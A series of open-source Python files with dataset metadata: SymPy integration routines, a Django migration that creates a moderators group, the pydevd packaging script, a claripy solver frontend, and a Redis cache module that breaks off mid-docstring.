h = h + i.doit(risch=False)
parts.append(coeff*h)
continue
# fall back to heurisch
try:
if conds == 'piecewise':
h = heurisch_wrapper(g, x, hints=[])
else:
h = heurisch(g, x, hints=[])
except PolynomialError:
# XXX: this exception means there is a bug in the
# implementation of heuristic Risch integration
# algorithm.
h = None
else:
h = None
if meijerg is not False and h is None:
# rewrite using G functions
try:
h = meijerint_indefinite(g, x)
except NotImplementedError:
from sympy.integrals.meijerint import _debug
_debug('NotImplementedError from meijerint_definite')
res = None
if h is not None:
parts.append(coeff * h)
continue
if h is None and manual is not False:
try:
result = manualintegrate(g, x)
if result is not None and not isinstance(result, Integral):
if result.has(Integral):
# try to have other algorithms do the integrals
# manualintegrate can't handle
result = result.func(*[
arg.doit(manual=False) if arg.has(Integral) else arg
for arg in result.args
]).expand(multinomial=False,
log=False,
power_exp=False,
power_base=False)
if not result.has(Integral):
parts.append(coeff * result)
continue
except (ValueError, PolynomialError):
# can't handle some SymPy expressions
pass
# if we failed maybe it was because we had
# a product that could have been expanded,
# so let's try an expansion of the whole
# thing before giving up; we don't try this
# out the outset because there are things
# that cannot be solved unless they are
# NOT expanded e.g., x**x*(1+log(x)). There
# should probably be a checker somewhere in this
# routine to look for such cases and try to do
# collection on the expressions if they are already
# in an expanded form
if not h and len(args) == 1:
f = f.expand(mul=True, deep=False)
if f.is_Add:
# Note: risch will be identical on the expanded
# expression, but maybe it will be able to pick out parts,
# like x*(exp(x) + erf(x)).
return self._eval_integral(f, x, meijerg=meijerg, risch=risch, conds=conds)
if h is not None:
parts.append(coeff * h)
else:
return None
return Add(*parts)
def _eval_lseries(self, x, logx):
self = self.as_dummy()
symb = x
for l in self.limits:
if x in l[1:]:
symb = l[0]
break
for term in self.function.lseries(symb, logx):
yield integrate(term, *self.limits)
def _eval_nseries(self, x, n, logx):
self = self.as_dummy()
symb = x
for l in self.limits:
if x in l[1:]:
symb = l[0]
break
terms, order = self.function.nseries(
x=symb, n=n, logx=logx).as_coeff_add(C.Order)
return integrate(terms, *self.limits) + Add(*order)*x
def as_sum(self, n, method="midpoint"):
"""
Approximates the definite integral by a sum.
method ... one of: left, right, midpoint, trapezoid
These are all basically the rectangle method [1], the only difference
is where the function value is taken in each interval to define the
rectangle.
[1] http://en.wikipedia.org/wiki/Rectangle_method
Examples
========
>>> from sympy import sin, sqrt
>>> from sympy.abc import x
>>> from sympy.integrals import Integral
>>> e = Integral(sin(x), (x, 3, 7))
>>> e
Integral(sin(x), (x, 3, 7))
For demonstration purposes, this interval will only be split into 2
regions, bounded by [3, 5] and [5, 7].
The left-hand rule uses function evaluations at the left of each
interval:
>>> e.as_sum(2, 'left')
2*sin(5) + 2*sin(3)
The midpoint rule uses evaluations at the center of each interval:
>>> e.as_sum(2, 'midpoint')
2*sin(4) + 2*sin(6)
The right-hand rule uses function evaluations at the right of each
interval:
>>> e.as_sum(2, 'right')
2*sin(5) + 2*sin(7)
The trapezoid rule uses function evaluations on both sides of the
intervals. This is equivalent to taking the average of the left and
right hand rule results:
>>> e.as_sum(2, 'trapezoid')
2*sin(5) + sin(3) + sin(7)
>>> (e.as_sum(2, 'left') + e.as_sum(2, 'right'))/2 == _
True
All but the trapexoid method may be used when dealing with a function
with a discontinuity. Here, the discontinuity at x = 0 can be avoided
by using the midpoint or right-hand method:
>>> e = Integral(1/sqrt(x), (x, 0, 1))
>>> e.as_sum(5).n(4)
1.730
>>> e.as_sum(10).n(4)
1.809
>>> e.doit().n(4) # the actual value is 2
2.000
The left- or trapezoid method will encounter the discontinuity and
return oo:
>>> e.as_sum(5, 'left')
oo
>>> e.as_sum(5, 'trapezoid')
oo
See Also
========
Integral.doit : Perform the integration using any hints
"""
limits = self.limits
if len(limits) > 1:
raise NotImplementedError(
"Multidimensional midpoint rule not implemented yet")
else:
limit = limits[0]
if len(limit) != 3:
raise ValueError("Expecting a definite integral.")
if n <= 0:
raise ValueError("n must be > 0")
if n == oo:
raise NotImplementedError("Infinite summation not yet implemented")
sym, lower_limit, upper_limit = limit
dx = (upper_limit - lower_limit)/n
if method == 'trapezoid':
l = self.function.limit(sym, lower_limit)
r = self.function.limit(sym, upper_limit, "-")
result = (l + r)/2
for i in range(1, n):
x = lower_limit + i*dx
result += self.function.subs(sym, x)
return result*dx
elif method not in ('left', 'right', 'midpoint'):
raise NotImplementedError("Unknown method %s" % method)
result = 0
for i in range(n):
if method == "midpoint":
xi = lower_limit + i*dx + dx/2
elif method == "left":
xi = lower_limit + i*dx
if i == 0:
result = self.function.limit(sym, lower_limit)
continue
elif method == "right":
xi = lower_limit + i*dx + dx
if i == n:
result += self.function.limit(sym, upper_limit, "-")
continue
result += self.function.subs(sym, xi)
return result*dx
@xthreaded
def integrate(*args, **kwargs):
"""integrate(f, var, ...)
Compute definite or indefinite integral of one or more variables
using Risch-Norman algorithm and table lookup. This procedure is
able to handle elementary algebraic and transcendental functions
and also a huge class of special functions, including Airy,
Bessel, Whittaker and Lambert.
var can be:
- a symbol -- indefinite integration
- a tuple (symbol, a) -- indefinite integration with result
given with `a` replacing `symbol`
- a tuple (symbol, a, b) -- definite integration
Several variables can be specified, in which case the result is
multiple integration. (If var is omitted and the integrand is
univariate, the indefinite integral in that variable will be performed.)
Indefinite integrals are returned without terms that are independent
of the integration variables. (see examples)
Definite improper integrals often entail delicate convergence
conditions. Pass conds='piecewise', 'separate' or 'none' to have
these returned, respectively, as a Piecewise function, as a separate
result (i.e. result will be a tuple), or not at all (default is
'piecewise').
**Strategy**
SymPy uses various approaches to definite integration. One method is to
find an antiderivative for the integrand, and then use the fundamental
theorem of calculus. Various functions are implemented to integrate
polynomial, rational and trigonometric functions, and integrands
containing DiracDelta terms.
SymPy also implements the part of the Risch algorithm, which is a decision
procedure for integrating elementary functions, i.e., the algorithm can
either find an elementary antiderivative, or prove that one does not
exist. There is also a (very successful, albeit somewhat slow) general
implementation of the heuristic Risch algorithm. This algorithm will
eventually be phased out as more of the full Risch algorithm is
implemented. See the docstring of Integral._eval_integral() for more
details on computing the antiderivative using algebraic methods.
The option risch=True can be used to use only the (full) Risch algorithm.
This is useful if you want to know if an elementary function has an
elementary antiderivative. If the indefinite Integral returned by this
function is an instance of NonElementaryIntegral, that means that the
Risch algorithm has proven that integral to be non-elementary. Note that
by default, additional methods (such as the Meijer G method outlined
below) are tried on these integrals, as they may be expressible in terms
of special functions, so if you only care about elementary answers, use
risch=True. Also note that an unevaluated Integral returned by this
function is not necessarily a NonElementaryIntegral, even with risch=True,
as it may just be an indication that the particular part of the Risch
algorithm needed to integrate that function is not yet implemented.
Another family of strategies comes from re-writing the integrand in
terms of so-called Meijer G-functions. Indefinite integrals of a
single G-function can always be computed, and the definite integral
of a product of two G-functions can be computed from zero to
infinity. Various strategies are implemented to rewrite integrands
as G-functions, and use this information to compute integrals (see
the ``meijerint`` module).
The option manual=True can be used to use only an algorithm that tries
to mimic integration by hand. This algorithm does not handle as many
integrands as the other algorithms implemented but may return results in
a more familiar form. The ``manualintegrate`` module has functions that
return the steps used (see the module docstring for more information).
In general, the algebraic methods work best for computing
antiderivatives of (possibly complicated) combinations of elementary
functions. The G-function methods work best for computing definite
integrals from zero to infinity of moderately complicated
combinations of special functions, or indefinite integrals of very
simple combinations of special functions.
The strategy employed by the integration code is as follows:
- If computing a definite integral, and both limits are real,
and at least one limit is +- oo, try the G-function method of
definite integration first.
- Try to find an antiderivative, using all available methods, ordered
by performance (that is try fastest method first, slowest last; in
particular polynomial integration is tried first, meijer
g-functions second to last, and heuristic risch last).
- If still not successful, try G-functions irrespective of the
limits.
The option meijerg=True, False, None can be used to, respectively:
always use G-function methods and no others, never use G-function
methods, or use all available methods (in order as described above).
It defaults to None.
Examples
========
>>> from sympy import integrate, log, exp, oo
>>> from sympy.abc import a, x, y
>>> integrate(x*y, x)
x**2*y/2
>>> integrate(log(x), x)
x*log(x) - x
>>> integrate(log(x), (x, 1, a))
a*log(a) - a + 1
>>> integrate(x)
x**2/2
Terms that are independent of x are dropped by indefinite integration:
>>> from sympy import sqrt
>>> integrate(sqrt(1 + x), (x, 0, x))
2*(x + 1)**(3/2)/3 - 2/3
>>> integrate(sqrt(1 + x), x)
2*(x + 1)**(3/2)/3
>>> integrate(x*y)
Traceback (most recent call last):
...
ValueError: specify integration variables to integrate x*y
Note that ``integrate(x)`` syntax is meant only for convenience
in interactive sessions and should be avoided in library code.
>>> integrate(x**a*exp(-x), (x, 0, oo)) # same as conds='piecewise'
Piecewise((gamma(a + 1), -re(a) < 1),
(Integral(x**a*exp(-x), (x, 0, oo)), True))
>>> integrate(x**a*exp(-x), (x, 0, oo), conds='none')
gamma(a + 1)
>>> integrate(x**a*exp(-x), (x, 0, oo), conds='separate')
(gamma(a + 1), -re(a) < 1)
See Also
========
Integral, Integral.doit
"""
meijerg = kwargs.pop('meijerg', None)
conds = kwargs.pop('conds', 'piecewise')
risch = kwargs.pop('risch', None)
manual = kwargs.pop('manual', None)
integral = Integral(*args, **kwargs)
if isinstance(integral, Integral):
return integral.doit(deep=False, meijerg=meijerg, conds=conds,
risch=risch, manual=manual)
else:
return integral
@xthreaded
def line_integrate(field, curve, vars):
"""line_integrate(field, Curve, variables)
Compute the line integral.
Examples
========
>>> from sympy import Curve, line_integrate, E, ln
>>> from sympy.abc import x, y, t
>>> C = Curve([E**t + 1, E**t - 1], (t, 0, ln(2)))
>>> line_integrate(x + y, C, [x, y])
3*sqrt(2)
See Also
========
integrate, Integral
"""
F = sympify(field)
if not F:
raise ValueError(
"Expecting function specifying field as first argument.")
if not isinstance(curve, Curve):
raise ValueError("Expecting Curve entity as second argument.")
if not is_sequence(vars):
raise ValueError("Expecting ordered iterable for variables.")
if len(curve.functions) != len(vars):
raise ValueError("Field variable size does not match curve dimension.")
if curve.parameter in vars:
raise ValueError("Curve parameter clashes with field parameters.")
# Calculate derivatives for line parameter functions
# F(r) -> F(r(t)) and finally F(r(t)*r'(t))
Ft = F
dldt = 0
for i, var in enumerate(vars):
_f = curve.functions[i]
_dn = diff(_f, curve.parameter)
# ...arc length
dldt = dldt + (_dn * _dn)
Ft = Ft.subs(var, _f)
Ft = Ft * sqrt(dldt)
integral = Integral(Ft, curve.limits).doit(deep=False)
return integral
| {
"content_hash": "f074b43420b79718eb6aa7f8ba5cd8a8",
"timestamp": "",
"source": "github",
"line_count": 1341,
"max_line_length": 95,
"avg_line_length": 37.882923191648025,
"alnum_prop": 0.5517214228066377,
"repo_name": "ojengwa/sympy",
"id": "951e1b16129e58899b3348235d053889b30bf7ae",
"size": "50801",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sympy/integrals/integrals.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations
from django.contrib.auth.models import Group, User
def add_moderator_group(apps, schema_editor):
g = Group.objects.create(name="moderators")
g.save()
for user in User.objects.all():
# add any existing admin users
# to the moderators group when we create it
if user.is_superuser:
g.user_set.add(user)
class Migration(migrations.Migration):
dependencies = [("auth", "0008_alter_user_username_max_length")]
operations = [migrations.RunPython(add_moderator_group)]
| {
"content_hash": "359f0a72f90d610fcd34dfd9a9bdbebf",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 68,
"avg_line_length": 28.428571428571427,
"alnum_prop": 0.6917922948073701,
"repo_name": "DemocracyClub/EveryElection",
"id": "a96c4562d6a092303b8c5bed8ca5b6e46d686109",
"size": "621",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "every_election/apps/core/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "37294"
},
{
"name": "JavaScript",
"bytes": "3930"
},
{
"name": "Python",
"bytes": "548734"
},
{
"name": "SCSS",
"bytes": "3314"
}
],
"symlink_target": ""
} |
r'''
Full setup, used to distribute the debugger backend to PyPi.
Note that this is mostly so that users can do:
pip install pydevd
in a machine for doing remote-debugging, as a local installation with the IDE should have
everything already distributed.
Reference on wheels:
https://hynek.me/articles/sharing-your-labor-of-love-pypi-quick-and-dirty/
http://lucumr.pocoo.org/2014/1/27/python-on-wheels/
Another (no wheels): https://jamie.curle.io/blog/my-first-experience-adding-package-pypi/
New version: change version and then:
rm dist/pydevd*
C:\tools\Miniconda32\Scripts\activate py27_32
python setup.py sdist bdist_wheel
deactivate
dir dist
C:\tools\Miniconda32\Scripts\activate py34_32
python setup.py sdist bdist_wheel
deactivate
dir dist
C:\tools\Miniconda32\Scripts\activate py35_32
python setup.py sdist bdist_wheel
deactivate
dir dist
C:\tools\Miniconda32\Scripts\activate py36_32
python setup.py sdist bdist_wheel
deactivate
dir dist
C:\tools\Miniconda\Scripts\activate py27_64
python setup.py sdist bdist_wheel
deactivate
dir dist
C:\tools\Miniconda\Scripts\activate py34_64
python setup.py sdist bdist_wheel
deactivate
dir dist
C:\tools\Miniconda\Scripts\activate py35_64
python setup.py sdist bdist_wheel
deactivate
dir dist
C:\tools\Miniconda\Scripts\activate py36_64
python setup.py sdist bdist_wheel
deactivate
dir dist
twine upload dist/pydevd*
git tag pydev_debugger_1_1_1 -a -m "PyDev.Debugger 1.1.1"
git push --tags
'''
from setuptools import setup
from setuptools.dist import Distribution
from distutils.extension import Extension
import os
class BinaryDistribution(Distribution):
def is_pure(self):
return False
data_files = []
def accept_file(f):
f = f.lower()
for ext in '.py .dll .so .dylib .txt .cpp .h .bat .c .sh .md .txt'.split():
if f.endswith(ext):
return True
return f in ['readme', 'makefile']
data_files.append(('pydevd_attach_to_process', [os.path.join('pydevd_attach_to_process', f) for f in os.listdir('pydevd_attach_to_process') if accept_file(f)]))
for root, dirs, files in os.walk("pydevd_attach_to_process"):
for d in dirs:
data_files.append((os.path.join(root, d), [os.path.join(root, d, f) for f in os.listdir(os.path.join(root, d)) if accept_file(f)]))
import pydevd
version = pydevd.__version__
args = dict(
name='pydevd',
version=version,
description = 'PyDev.Debugger (used in PyDev and PyCharm)',
author='Fabio Zadrozny and others',
url='https://github.com/fabioz/PyDev.Debugger/',
license='EPL (Eclipse Public License)',
packages=[
'_pydev_bundle',
'_pydev_imps',
'_pydev_runfiles',
'_pydevd_bundle',
'_pydevd_frame_eval',
'pydev_ipython',
# 'pydev_sitecustomize', -- Not actually a package (not added)
# 'pydevd_attach_to_process', -- Not actually a package (included in MANIFEST.in)
'pydevd_concurrency_analyser',
'pydevd_plugins',
'pydevd_plugins.extensions',
],
py_modules=[
# 'interpreterInfo', -- Not needed for debugger
# 'pycompletionserver', -- Not needed for debugger
'pydev_app_engine_debug_startup',
# 'pydev_coverage', -- Not needed for debugger
# 'pydev_pysrc', -- Not needed for debugger
'pydev_run_in_console',
'pydevconsole',
'pydevd_file_utils',
'pydevd',
'pydevd_tracing',
# 'runfiles', -- Not needed for debugger
# 'setup_cython', -- Should not be included as a module
# 'setup', -- Should not be included as a module
],
classifiers=[
'Development Status :: 6 - Mature',
'Environment :: Console',
'Intended Audience :: Developers',
# It seems that the license is not recognized by Pypi, so, not categorizing it for now.
# https://bitbucket.org/pypa/pypi/issues/369/the-eclipse-public-license-superseeded
# 'License :: OSI Approved :: Eclipse Public License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: Software Development :: Debuggers',
],
entry_points={
'console_scripts':[
'pydevd = pydevd:main',
],
},
data_files=data_files,
keywords=['pydev', 'pydevd', 'pydev.debugger'],
include_package_data=True,
zip_safe=False,
)
import sys
try:
args_with_binaries = args.copy()
args_with_binaries.update(dict(
distclass=BinaryDistribution,
ext_modules=[
# In this setup, don't even try to compile with cython, just go with the .c file which should've
# been properly generated from a tested version.
Extension('_pydevd_bundle.pydevd_cython', ["_pydevd_bundle/pydevd_cython.c",])
]
))
setup(**args_with_binaries)
except:
# Compile failed: just setup without compiling cython deps.
setup(**args)
sys.stdout.write('Plain-python version of pydevd installed (cython speedups not available).\n')
| {
"content_hash": "7adc36e8aa5b3a6c716233c3647aab74",
"timestamp": "",
"source": "github",
"line_count": 176,
"max_line_length": 160,
"avg_line_length": 29.125,
"alnum_prop": 0.6685524775653531,
"repo_name": "ThiagoGarciaAlves/intellij-community",
"id": "e779033a7d89184b6d60dfb4c7392e23dcd62b5f",
"size": "5126",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "python/helpers/pydev/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AMPL",
"bytes": "20665"
},
{
"name": "AspectJ",
"bytes": "182"
},
{
"name": "Batchfile",
"bytes": "63518"
},
{
"name": "C",
"bytes": "214180"
},
{
"name": "C#",
"bytes": "1538"
},
{
"name": "C++",
"bytes": "190028"
},
{
"name": "CSS",
"bytes": "111474"
},
{
"name": "CoffeeScript",
"bytes": "1759"
},
{
"name": "Cucumber",
"bytes": "14382"
},
{
"name": "Erlang",
"bytes": "10"
},
{
"name": "FLUX",
"bytes": "57"
},
{
"name": "Groff",
"bytes": "35232"
},
{
"name": "Groovy",
"bytes": "2194261"
},
{
"name": "HTML",
"bytes": "1726130"
},
{
"name": "J",
"bytes": "5050"
},
{
"name": "Java",
"bytes": "148273590"
},
{
"name": "JavaScript",
"bytes": "125292"
},
{
"name": "Kotlin",
"bytes": "454154"
},
{
"name": "Lex",
"bytes": "166177"
},
{
"name": "Makefile",
"bytes": "2352"
},
{
"name": "NSIS",
"bytes": "85969"
},
{
"name": "Objective-C",
"bytes": "28634"
},
{
"name": "Perl6",
"bytes": "26"
},
{
"name": "Protocol Buffer",
"bytes": "6570"
},
{
"name": "Python",
"bytes": "21460459"
},
{
"name": "Ruby",
"bytes": "1213"
},
{
"name": "Scala",
"bytes": "11698"
},
{
"name": "Shell",
"bytes": "63190"
},
{
"name": "Smalltalk",
"bytes": "64"
},
{
"name": "TeX",
"bytes": "60798"
},
{
"name": "TypeScript",
"bytes": "6152"
},
{
"name": "XSLT",
"bytes": "113040"
}
],
"symlink_target": ""
} |
import logging
l = logging.getLogger("claripy.frontends.light_frontend")
from ..frontend import Frontend
class LightFrontend(Frontend):
def __init__(self, solver_backend):
Frontend.__init__(self, solver_backend)
self.constraints = [ ]
self.variables = set()
self._finalized = False
#
# Storable support
#
def _ana_getstate(self):
if not self._simplified: self.simplify()
self.finalize()
return self.constraints, self.variables, Frontend._ana_getstate(self)
def _ana_setstate(self, s):
self.constraints, self.variables, base_state = s
Frontend._ana_setstate(self, base_state)
self._finalized = True
#
# Constraint management
#
def independent_constraints(self):
return self._split_constraints(self.constraints)
#
# Light functionality
#
def _add_constraints(self, constraints, invalidate_cache=True):
self.constraints += constraints
for c in constraints:
self.variables.update(c.variables)
return constraints
def _simplify(self):
if len(self.constraints) == 0:
return
self.constraints = [ simplify(And(*self.constraints)) ]
# generate UUIDs for every constraint
for c in self.constraints:
if isinstance(c, Base): c.make_uuid()
self._simplified = True
return self.constraints
def _solve(self, extra_constraints=()):
return SatResult(approximation=True)
def _satisfiable(self, extra_constraints=()):
return self.solve(extra_constraints=extra_constraints).sat
def _eval(self, e, n, extra_constraints=()):
if len(extra_constraints) == 0:
for b in _eager_backends + [ self._solver_backend ]:
try: return b.eval(e, n, result=self.result)
except BackendError: pass
raise ClaripyFrontendError("Light solver can't handle this eval().")
def _max(self, e, extra_constraints=()):
if len(extra_constraints) == 0:
for b in _eager_backends + [ self._solver_backend ]:
try: return b.max(e, result=self.result)
except BackendError: pass
raise ClaripyFrontendError("Light solver can't handle this max().")
def _min(self, e, extra_constraints=()):
extra_constraints = self._constraint_filter(extra_constraints)
if len(extra_constraints) == 0:
for b in _eager_backends + [ self._solver_backend ]:
try: return b.min(e, result=self.result)
except BackendError: pass
two = self.eval(e, 2, extra_constraints=extra_constraints)
if len(two) == 0: raise UnsatError("unsat during min()")
elif len(two) == 1: return two[0]
raise ClaripyFrontendError("Light solver can't handle this min().")
def _solution(self, e, v, extra_constraints=()):
if len(extra_constraints) == 0:
for b in _eager_backends + [ self._solver_backend ]:
try: return b.solution(e, v, result=self.result)
except BackendError: pass
raise ClaripyFrontendError("Light solver can't handle this solution().")
#
# Serialization and such.
#
def downsize(self):
Frontend.downsize(self)
#
# Merging and splitting
#
def finalize(self):
self._finalized = True
def branch(self):
s = Frontend.branch(self)
s.constraints = list(self.constraints)
s.variables = set(self.variables)
self.finalize()
s.finalize()
return s
def merge(self, others, merge_flag, merge_values):
merged = self.__class__(self._solver_backend)
merged._simplified = False
options = [ ]
for s, v in zip([self]+others, merge_values):
options.append(And(*([ merge_flag == v ] + s.constraints)))
merged.add([Or(*options)])
return self._solver_backend is backend_z3, merged
def combine(self, others):
combined = self.__class__(self._solver_backend)
combined._simplified = False
combined.add(self.constraints) #pylint:disable=E1101
for o in others:
combined.add(o.constraints)
return combined
def split(self):
results = [ ]
l.debug("Splitting!")
for variables,c_list in self.independent_constraints():
l.debug("... got %d constraints with %d variables", len(c_list), len(variables))
s = self.__class__(self._solver_backend)
s._simplified = False
s.add(c_list)
results.append(s)
return results
from ..result import SatResult
from ..errors import UnsatError, BackendError, ClaripyFrontendError
from .. import _eager_backends, backend_z3
from ..ast.base import Base, simplify
from ..ast.bool import And, Or
| {
"content_hash": "071e75b7ae51e1e764044f0409e98aee",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 83,
"avg_line_length": 26.58125,
"alnum_prop": 0.700446743475194,
"repo_name": "avain/claripy",
"id": "40d39c28b1cabff4f4f97c652f9d40cd6dbcbb52",
"size": "4276",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "claripy/frontends/light_frontend.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "415269"
}
],
"symlink_target": ""
} |
import inspect
import functools
from itertools import izip
from rc.redis_clients import RedisClient
from rc.redis_cluster import RedisCluster
from rc.serializer import JSONSerializer
from rc.utils import generate_key_for_cached_func
from rc.promise import Promise
#: Running mode for cache
NORMAL_MODE = 0
BATCH_MODE = 1
class cached_property(object):
def __init__(self, fget):
self.fget = fget
def __get__(self, obj, objtype):
rv = obj.__dict__[self.fget.__name__] = self.fget(obj)
return rv
class BaseCache(object):
"""Baseclass for all redis cache systems.
:param namespace: a prefix that should be added to all keys
:param serializer_cls: the serialization class you want to use.
:param default_expire: default expiration time that is used if no
expire specified on :meth:`~rc.cache.BaseCache.set`.
:param bypass_values: a list of return values that would be ignored by the
cache decorator and won't be cached at all.
.. versionadded:: 0.3
The `bypass_values` parameter was added.
"""
def __init__(self, namespace=None, serializer_cls=None,
default_expire=3 * 24 * 3600, bypass_values=[]):
if serializer_cls is None:
serializer_cls = JSONSerializer
self.namespace = namespace or ''
self.serializer_cls = serializer_cls
self.default_expire = default_expire
self.bypass_values = bypass_values
self._running_mode = NORMAL_MODE
self._pending_operations = []
def get_client(self):
"""Returns the redis client that is used for cache."""
raise NotImplementedError()
@cached_property
def client(self):
"""Returns the redis client that is used for cache."""
return self.get_client()
@cached_property
def serializer(self):
"""Returns the serializer instance that is used for cache."""
return self.serializer_cls()
def _raw_get(self, key):
return self.client.get(self.namespace + key)
def _raw_set(self, key, string, expire=None):
if expire is None:
expire = self.default_expire
return self.client.setex(self.namespace + key, expire, string)
def _raw_get_many(self, *keys):
if not keys:
return []
if self.namespace:
keys = [self.namespace + key for key in keys]
return self.client.mget(keys)
def get(self, key):
"""Returns the value for the cache key, otherwise `None` is returned.
:param key: cache key
"""
return self.serializer.loads(self._raw_get(key))
def set(self, key, value, expire=None):
"""Adds or overwrites key/value to the cache. The value expires in
time seconds.
:param key: cache key
:param value: value for the key
:param expire: expiration time
:return: Whether the key has been set
"""
return self._raw_set(key, self.serializer.dumps(value), expire)
def delete(self, key):
"""Deletes the value for the cache key.
:param key: cache key
:return: Whether the key has been deleted
"""
return self.client.delete(self.namespace + key)
def get_many(self, *keys):
"""Returns the a list of values for the cache keys."""
return [self.serializer.loads(s) for s in self._raw_get_many(*keys)]
def set_many(self, mapping, expire=None):
"""Sets multiple keys and values using dictionary.
The values expires in time seconds.
:param mapping: a dictionary with key/values to set
:param expire: expiration time
:return: whether all keys has been set
"""
if not mapping:
return True
rv = True
for key, value in mapping.iteritems():
if not self.set(key, value, expire):
rv = False
return rv
def delete_many(self, *keys):
"""Deletes multiple keys.
:return: whether all keys has been deleted
"""
if not keys:
return True
return all(self.delete(key) for key in keys)
def cache(self, key_prefix=None, expire=None, include_self=False):
"""A decorator that is used to cache a function with supplied
parameters. It is intended for decorator usage::
@cache.cache()
def load(name):
return load_from_database(name)
rv = load('foo')
rv = load('foo') # returned from cache
The cache key doesn't need to be specified, it will be created with
the name of the module + the name of the function + function arguments.
:param key_prefix: this is used to ensure cache result won't clash
with another function that has the same name
in this module, normally you do not need to pass
this in
:param expire: expiration time
:param include_self: whether to include the `self` or `cls` as
cache key for method or not, default to be False
.. note::
The function being decorated must be called with the same
positional and keyword arguments. Otherwise, you might create
multiple caches. If you pass one parameter as positional, do it
always.
.. note::
Using objects as part of the cache key is possible, though it is
suggested to not pass in an object instance as parameter. We
perform a str() on the passed in objects so that you can provide
a __str__ function that returns a identifying string for that
object, the unique string will be used as part of the cache key.
.. note::
When a method on a class is decorated, the ``self`` or ``cls``
arguments is not included in the cache key. Starting from 0.2
you can control it with `include_self`. If you set
`include_self` to True, remember to provide `__str__` method
for the object, otherwise you might encounter random behavior.
.. versionadded:: 0.2
The `include_self` parameter was added.
"""
def decorator(f):
argspec = inspect.getargspec(f)
if argspec and argspec[0] and argspec[0][0] in ('self', 'cls'):
has_self = True
else:
has_self = False
@functools.wraps(f)
def wrapper(*args, **kwargs):
cache_args = args
# handle self and cls
if has_self:
if not include_self:
cache_args = args[1:]
cache_key = generate_key_for_cached_func(
key_prefix, f, *cache_args, **kwargs)
if self._running_mode == BATCH_MODE:
promise = Promise()
self._pending_operations.append(
(f, args, kwargs, promise, cache_key, expire))
return promise
rv = self._raw_get(cache_key)
if rv is None:
value = f(*args, **kwargs)
rv = self.serializer.dumps(value)
if value not in self.bypass_values:
self._raw_set(cache_key, rv, expire)
return self.serializer.loads(rv)
wrapper.__rc_cache_params__ = {
'key_prefix': key_prefix,
'expire': expire,
'include_self': include_self,
}
return wrapper
return decorator
def invalidate(self, func, *args, **kwargs):
"""Invalidate a cache decorated function. You must call this with
the same positional and keyword arguments as what you did when you
call the decorated function, otherwise the cache will not be deleted.
The usage is simple::
@cache.cache()
def load(name, limit):
return load_from_database(name, limit)
rv = load('foo', limit=5)
cache.invalidate(load, 'foo', limit=5)
:param func: decorated function to invalidate
:param args: same positional arguments as you call the function
:param kwargs: same keyword arguments as you call the function
:return: whether it is invalidated or not
"""
try:
cache_params = func.__rc_cache_params__
except AttributeError:
raise TypeError('Attempted to invalidate a function that is'
'not cache decorated')
key_prefix = cache_params['key_prefix']
cache_args = args
include_self = cache_params.get('include_self', False)
if include_self:
instance_self = getattr(func, '__self__', None)
if instance_self:
cache_args = tuple([instance_self] + list(args))
cache_key = generate_key_for_cached_func(
key_prefix, func, *cache_args, **kwargs)
return self.delete(cache_key)
def batch_mode(self):
"""Returns a context manager for cache batch mode. This is used
to batch fetch results of cache decorated functions. All results
returned by cache decorated function will be
:class:`~rc.promise.Promise` object. This context manager runs the
batch fetch and then resolves all promises in the end. Example::
results = []
with cache.batch_mode():
for i in range(10):
results.append(get_result(i))
results = map(lambda r: r.value, results)
.. note::
When you are using rc on this mode, rc is not thread safe.
"""
return BatchManager(self)
def batch(self, cancel=False):
if self._running_mode != BATCH_MODE:
raise RuntimeError('You have to batch on batch mode.')
pending_operations = self._pending_operations
self._pending_operations = []
self._running_mode = NORMAL_MODE
if cancel:
return
cache_keys = []
for f, args, kwargs, promise, cache_key, expire in pending_operations:
cache_keys.append(cache_key)
cache_results = self._raw_get_many(*cache_keys)
for rv, (func, args, kwargs, promise, cache_key, expire) in izip(
cache_results, pending_operations):
if rv is None:
value = func(*args, **kwargs)
rv = self.serializer.dumps(value)
if value not in self.bypass_values:
self._raw_set(cache_key, rv, expire)
promise.resolve(self.serializer.loads(rv))
class Cache(BaseCache):
"""Uses a single Redis server as backend.
:param host: address of the Redis, this is compatible with the official
Python StrictRedis cilent (redis-py).
:param port: port number of the Redis server.
:param db: db numeric index of the Redis server.
:param password: password authentication for the Redis server.
:param socket_timeout: socket timeout for the StrictRedis client.
:param namespace: a prefix that should be added to all keys.
:param serializer_cls: the serialization class you want to use.
By default, it is :class:`rc.JSONSerializer`.
:param default_expire: default expiration time that is used if no
expire specified on :meth:`set`.
:param redis_options: a dictionary of parameters that are useful for
setting other parameters to the StrictRedis client.
:param bypass_values: a list of return values that would be ignored by the
cache decorator and won't be cached at all.
.. versionadded:: 0.3
The `bypass_values` parameter was added.
"""
def __init__(self, host='localhost', port=6379, db=0, password=None,
socket_timeout=None, namespace=None, serializer_cls=None,
default_expire=3 * 24 * 3600, redis_options=None,
bypass_values=[]):
BaseCache.__init__(self, namespace, serializer_cls, default_expire,
bypass_values)
if redis_options is None:
redis_options = {}
self.host = host
self.port = port
self.db = db
self.password = password
self.socket_timeout = socket_timeout
self.redis_options = redis_options
def get_client(self):
return RedisClient(host=self.host, port=self.port, db=self.db,
password=self.password,
socket_timeout=self.socket_timeout,
**self.redis_options)
def set_many(self, mapping, expire=None):
if not mapping:
return True
if expire is None:
expire = self.default_expire
pipe = self.client.pipeline()
for key, value in mapping.iteritems():
string = self.serializer.dumps(value)
pipe.setex(self.namespace + key, expire, string)
return all(pipe.execute())
def delete_many(self, *keys):
if not keys:
return True
if self.namespace:
keys = [self.namespace + key for key in keys]
return self.client.delete(*keys)
class CacheCluster(BaseCache):
"""The a redis cluster as backend.
Basic example::
cache = CacheCluster({
0: {'port': 6379},
1: {'port': 6479},
